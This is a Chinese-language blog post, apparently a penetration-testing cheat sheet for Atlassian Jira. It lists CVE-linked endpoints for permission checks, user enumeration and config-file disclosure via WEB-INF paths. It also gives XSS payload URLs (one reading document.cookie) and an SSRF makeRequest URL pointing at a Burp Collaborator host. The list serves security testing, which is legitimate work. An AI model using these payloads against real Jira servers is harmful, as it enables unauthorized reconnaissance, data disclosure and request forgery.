Jira安全攻防指南:漏洞挖掘与渗透测试实战

本文深入剖析Jira项目管理工具的安全漏洞,涵盖权限配置、路径遍历、XSS攻击、用户枚举、SSRF等关键技术要点,并提供自动化工具和实战资源,帮助安全研究人员全面掌握Jira系统渗透测试方法。

攻破Jira

Jira是由Atlassian开发的项目管理和问题跟踪工具。它最常用于软件开发,但也可用于管理IT、业务和其他领域的项目。

Jira权限

Jira权限

Jira中的权限可以被任何用户访问:

  • ADD_COMMENTS

  • ADMINISTER

  • ADMINISTER_PROJECTS

  • ASSIGNABLE_USER

  • 等等…

要查看用户被授予的权限:

1
https://yourdomain.atlassian.net/rest/api/2/mypermissions?permissions=ADD_COMMENTS

将://后的域名替换为你的域名

选择以下权限之一,但要用它替换ADD_COMMENTS:

Jira中的重要路径

可以泄露信息的Jira路径:

  • /secure/ManageFilters.jspa?filter=popular&filterView=popular
  • /secure/Dashboard.jspa => 项目密钥枚举 => CVE-2020-14178
  • /secure/QueryComponent!Default.jspa => CVE-2020-14179
  • /secure/Dashboard.jspa/secure/QueryComponent!Default.jspa CVE-2020-14179
  • /secure/ViewUserHover.jspa?username=<uname> => CVE-2020-14181 用户名枚举
  • /secure/popups/UserPickerBroswer.jspa
  • /ConfigurePortalPages!default.jspa?view=popular
  • /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
  • /secure/popups/UserPickerBrowser.jspa
  • /_*/;/WEB-INF/web.xml*
  • */_*/;/WEB-INF/decorators.xml
  • /_*/;/WEB-INF/classes/seraph-config.xml*
  • */_*/;/META-INF/maven/com.atlassian.jira/jira-webappdist/pom.properties
  • /_*/;/META-INF/maven/com.atlassian.jira/jira-webappdist/pom.xml*
  • */_*/;/META-INF/maven/com.atlassian.jira/atlassianjira-webapp/pom.xml

通过Jira的XSS攻击

  • /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search
  • /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
  • /plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true
  • /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)

在Jira中枚举用户

  • 用户名枚举 => CVE-2019-3403
  • /rest/api/2/user/picker?query=admin
  • /rest/api/2/dashboard?maxResults=100
  • /rest/api/2/dashboard/FUZZ 从1-20000
  • /rest/api/3/mypermissions
  • /rest/api/2/mypermissions

Jira中的信息泄露

  • /rest/dashboards/1.0/10000/gadget/<GadgetId>/prefs
  • => 暴力破解10,000到20,000 => CVE-2020-36287
  • CVE-2019-8442 /s/thiscanbeanythingyouwant/_/METAINF/maven/com.atlassian.jira/atlassian-jirawebapp/pom.xml
  • CVE-2019-8449 /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true

SSRF

  • CVE-2019-8451
1
http://vulnerablehost.com/plugins/servlet/gadgets/makeRequest?url=http://vulnerablehost.com@[http://bur](http://bur/)[pcollab.net](http://pcollab.net/)

Jira中的自动化工具

  • Jira-Lens
  • jira_scan
  • Jiraffe

重要资源

https://github.com/UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计